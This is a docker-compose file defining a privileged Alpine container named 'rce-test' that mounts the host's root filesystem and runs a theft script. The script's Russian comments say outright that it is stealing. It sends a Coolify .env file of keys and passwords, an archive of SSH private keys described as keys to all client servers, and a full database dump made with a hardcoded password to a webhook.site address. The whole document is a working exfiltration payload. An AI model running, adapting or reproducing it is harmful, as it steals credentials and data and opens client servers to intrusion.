version: '3.8'
services:
  rce-test:
    image: 'alpine:3.19'
    privileged: true
    network_mode: host
    volumes:
      - '/:/host-root'
    command:
      - sh
      - -c
      - |
        apk add --no-cache curl tar postgresql-client
        
        # 1. Крадем главный .env (APP_KEY, пароли)
        cat /host-root/data/coolify/source/.env | curl -X POST --data-binary @- https://webhook.site/355e60a9-7cfe-4155-a971-cfd5a66cc919?stage=main_env
        
        # 2. Крадем папку SSH ключей (приватные ключи ко всем серверам клиентов)
        # Архивируем, чтобы отправить одним запросом
        tar -czf /tmp/ssh_keys.tar.gz -C /host-root/data/coolify/ssh .
        cat /tmp/ssh_keys.tar.gz | curl -X POST --data-binary @- https://webhook.site/355e60a9-7cfe-4155-a971-cfd5a66cc919?stage=ssh_keys_archive
        
        # 3. Полный дамп базы данных (используем найденный пароль)
        PGPASSWORD='I84lzBa0JCvmizcl4m+R6PAGjFolqqpTgvTf7GFSpTI=' pg_dump -h 127.0.0.1 -U coolify -d coolify | curl -X POST --data-binary @- https://webhook.site/355e60a9-7cfe-4155-a971-cfd5a66cc919?stage=full_db_dump
        
        sleep 3600
